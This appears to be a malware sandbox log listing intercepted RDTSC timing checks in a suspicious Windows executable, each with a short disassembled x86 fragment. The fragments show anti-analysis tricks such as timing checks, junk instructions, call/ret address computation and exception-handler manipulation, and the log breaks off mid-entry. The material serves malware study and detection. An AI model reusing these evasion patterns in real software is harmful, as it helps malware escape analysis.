Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8D84FE second address: 8D8520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jns 00007EFD88CA6412h 0x0000000d jns 00007EFD88CA640Ch 0x00000013 je 00007EFD88CA6406h 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push edi 0x00000021 pop edi 0x00000022 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8D8520 second address: 8D853D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88B5ADC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push edi 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8D853D second address: 8D854D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8D854D second address: 75F9E6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFD88B5ADC7h 0x00000008 jmp 00007EFD88B5ADC1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop eax 0x00000010 jmp 00007EFD88B5ADC7h 0x00000015 mov ecx, edi 0x00000017 push dword ptr [ebp+122D0A81h] 0x0000001d call dword ptr [ebp+122D2451h] 0x00000023 pushad 0x00000024 cmc 0x00000025 xor eax, eax 0x00000027 sub dword ptr [ebp+122D2D61h], esi 0x0000002d mov edx, dword ptr [esp+28h] 0x00000031 stc 0x00000032 mov dword ptr [ebp+122D37C9h], eax 0x00000038 js 00007EFD88B5ADC4h 0x0000003e mov esi, 0000003Ch 0x00000043 add dword ptr [ebp+122D2D61h], edi 0x00000049 stc 0x0000004a add esi, dword ptr [esp+24h] 0x0000004e js 00007EFD88B5ADBCh 0x00000054 mov dword ptr [ebp+122D2D61h], ecx 0x0000005a lodsw 0x0000005c jmp 00007EFD88B5ADC1h 0x00000061 add eax, dword ptr [esp+24h] 0x00000065 jmp 00007EFD88B5ADC0h 0x0000006a jmp 00007EFD88B5ADC0h 0x0000006f mov ebx, dword ptr [esp+24h] 0x00000073 jmp 00007EFD88B5ADC7h 0x00000078 nop 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c push edi 0x0000007d pop edi 0x0000007e rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8D8657 second address: 8D86D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007EFD88CA6406h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push ecx 0x00000011 jne 00007EFD88CA6408h 0x00000017 pop ecx 0x00000018 pop eax 0x00000019 push 00000003h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007EFD88CA6408h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 0000001Bh 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 push 00000000h 0x00000037 sub dword ptr [ebp+122D1D8Ah], esi 0x0000003d push 00000003h 0x0000003f mov dword ptr [ebp+122D1D32h], esi 0x00000045 mov dword ptr [ebp+122D19FCh], ebx 0x0000004b call 00007EFD88CA6409h 0x00000050 jmp 00007EFD88CA6410h 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jp 00007EFD88CA6408h 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8D86D1 second address: 8D86D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8D88EE second address: 8D88F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8D88F2 second address: 8D88F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8D88F6 second address: 8D88FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8F77F1 second address: 8F7826 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88B5ADBBh 0x00000007 ja 00007EFD88B5ADB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007EFD88B5ADCDh 0x00000015 jmp 00007EFD88B5ADC7h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8F79AB second address: 8F79AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8F79AF second address: 8F79B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8F7AF5 second address: 8F7AF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8F7AF9 second address: 8F7B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8F7B03 second address: 8F7B2D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 je 00007EFD88CA6406h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jc 00007EFD88CA6406h 0x00000016 pop ecx 0x00000017 push edx 0x00000018 jmp 00007EFD88CA6411h 0x0000001d pop edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8F7B2D second address: 8F7B39 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFD88B5ADBEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8F8084 second address: 8F8094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007EFD88CA6406h 0x0000000a jns 00007EFD88CA6406h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8C76C0 second address: 8C76C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8C76C4 second address: 8C76D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007EFD88CA6419h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8F8DE2 second address: 8F8DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8F8F8C second address: 8F8F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 903056 second address: 90306F instructions: 0x00000000 rdtsc 0x00000002 jne 00007EFD88B5ADB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007EFD88B5ADBBh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 90306F second address: 903099 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFD88CA6406h 0x00000008 jmp 00007EFD88CA6416h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007EFD88CA6406h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 903099 second address: 9030A6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007EFD88B5ADB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9034D5 second address: 9034DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9034DA second address: 9034F0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007EFD88B5ADBCh 0x00000008 jnp 00007EFD88B5ADB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9034F0 second address: 9034F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9034F6 second address: 9034FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9034FA second address: 9034FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9034FE second address: 90352C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007EFD88B5ADBDh 0x0000000c jmp 00007EFD88B5ADC9h 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 90352C second address: 903536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007EFD88CA6406h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 903891 second address: 90389D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jbe 00007EFD88B5ADB6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9039D6 second address: 9039E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 906853 second address: 906894 instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFD88B5ADB8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jbe 00007EFD88B5ADC2h 0x00000013 je 00007EFD88B5ADBCh 0x00000019 jl 00007EFD88B5ADB6h 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 push edi 0x00000024 jmp 00007EFD88B5ADC4h 0x00000029 pop edi 0x0000002a mov eax, dword ptr [eax] 0x0000002c push eax 0x0000002d push edx 0x0000002e push ebx 0x0000002f pushad 0x00000030 popad 0x00000031 pop ebx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 906894 second address: 9068BC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jc 00007EFD88CA6406h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007EFD88CA6416h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 906CDE second address: 906CE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 90744D second address: 907452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 90750A second address: 907530 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88B5ADC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b js 00007EFD88B5ADC0h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 90760F second address: 907613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 909AF7 second address: 909B89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88B5ADBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007EFD88B5ADB8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov edi, 25CEACC1h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007EFD88B5ADB8h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 0000001Ah 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 jmp 00007EFD88B5ADC8h 0x0000004d push 00000000h 0x0000004f jmp 00007EFD88B5ADC1h 0x00000054 xchg eax, ebx 0x00000055 push ecx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 909B89 second address: 909B8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 90A42A second address: 90A450 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFD88B5ADB8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007EFD88B5ADC7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 90B0DA second address: 90B0DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 90B0DF second address: 90B0E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 90B0E5 second address: 90B125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a clc 0x0000000b push 00000000h 0x0000000d sub dword ptr [ebp+1245D313h], esi 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007EFD88CA6408h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov edi, dword ptr [ebp+122D34D3h] 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 push edi 0x0000003a pop edi 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 90B125 second address: 90B12A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 90C540 second address: 90C550 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD88CA640Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 90C550 second address: 90C554 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 90E969 second address: 90E9E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA6413h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007EFD88CA6408h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov ebx, dword ptr [ebp+122D38BDh] 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D1C97h], edi 0x00000034 jmp 00007EFD88CA6413h 0x00000039 push 00000000h 0x0000003b mov dword ptr [ebp+122D34BEh], eax 0x00000041 jng 00007EFD88CA6411h 0x00000047 jmp 00007EFD88CA640Bh 0x0000004c xchg eax, esi 0x0000004d push ecx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 pop eax 0x00000052 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 90E9E2 second address: 90E9F3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007EFD88B5ADB6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 911BD8 second address: 911BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 911BDC second address: 911BF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88B5ADC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 911BF9 second address: 911C29 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007EFD88CA6417h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFD88CA6410h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 90D8E8 second address: 90D902 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFD88B5ADBCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007EFD88B5ADBEh 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 911C29 second address: 911C98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b call 00007EFD88CA640Fh 0x00000010 mov dword ptr [ebp+12478239h], edi 0x00000016 pop ebx 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007EFD88CA6408h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 sub edi, 6FAECF3Bh 0x00000039 push 00000000h 0x0000003b pushad 0x0000003c push edx 0x0000003d mov cx, FB16h 0x00000041 pop edi 0x00000042 sub dword ptr [ebp+122D1919h], edi 0x00000048 popad 0x00000049 push eax 0x0000004a push edi 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007EFD88CA6415h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 913E44 second address: 913E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 913E48 second address: 913EAE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFD88CA6406h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D2CB9h], ecx 0x00000013 jmp 00007EFD88CA6414h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007EFD88CA6408h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 xor di, F61Ah 0x00000039 push 00000000h 0x0000003b ja 00007EFD88CA640Ch 0x00000041 push eax 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 913EAE second address: 913EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 914EEA second address: 914F46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007EFD88CA6417h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 pushad 0x00000011 call 00007EFD88CA6418h 0x00000016 jng 00007EFD88CA6406h 0x0000001c pop esi 0x0000001d popad 0x0000001e push 00000000h 0x00000020 mov dword ptr [ebp+122D1C9Fh], edi 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 pop edi 0x0000002a xchg eax, esi 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e push eax 0x0000002f pop eax 0x00000030 jp 00007EFD88CA6406h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 90EC80 second address: 90EC86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 90FD66 second address: 90FD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007EFD88CA6418h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007EFD88CA6411h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 90EC86 second address: 90EC8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 915FC1 second address: 915FDD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007EFD88CA6414h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 910D2F second address: 910D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 911E6A second address: 911E70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 914031 second address: 9140D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007EFD88B5ADBFh 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007EFD88B5ADB8h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f sbb di, 7072h 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b push 00000000h 0x0000003d push edx 0x0000003e call 00007EFD88B5ADB8h 0x00000043 pop edx 0x00000044 mov dword ptr [esp+04h], edx 0x00000048 add dword ptr [esp+04h], 0000001Ah 0x00000050 inc edx 0x00000051 push edx 0x00000052 ret 0x00000053 pop edx 0x00000054 ret 0x00000055 mov edi, dword ptr [ebp+122D387Dh] 0x0000005b mov eax, dword ptr [ebp+122D0EE1h] 0x00000061 push edi 0x00000062 add dword ptr [ebp+122D34D3h], eax 0x00000068 pop ebx 0x00000069 sub dword ptr [ebp+122D1D8Fh], eax 0x0000006f push FFFFFFFFh 0x00000071 add ebx, 7B58A3ACh 0x00000077 mov dword ptr [ebp+12450FA2h], ecx 0x0000007d nop 0x0000007e pushad 0x0000007f jmp 00007EFD88B5ADBCh 0x00000084 pushad 0x00000085 push eax 0x00000086 push edx 0x00000087 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 912F33 second address: 912FB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007EFD88CA6408h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov ebx, dword ptr [ebp+122D34DFh] 0x00000029 push dword ptr fs:[00000000h] 0x00000030 add edi, 669205B2h 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov di, si 0x00000040 mov eax, dword ptr [ebp+122D1305h] 0x00000046 pushad 0x00000047 and ax, B028h 0x0000004c popad 0x0000004d push FFFFFFFFh 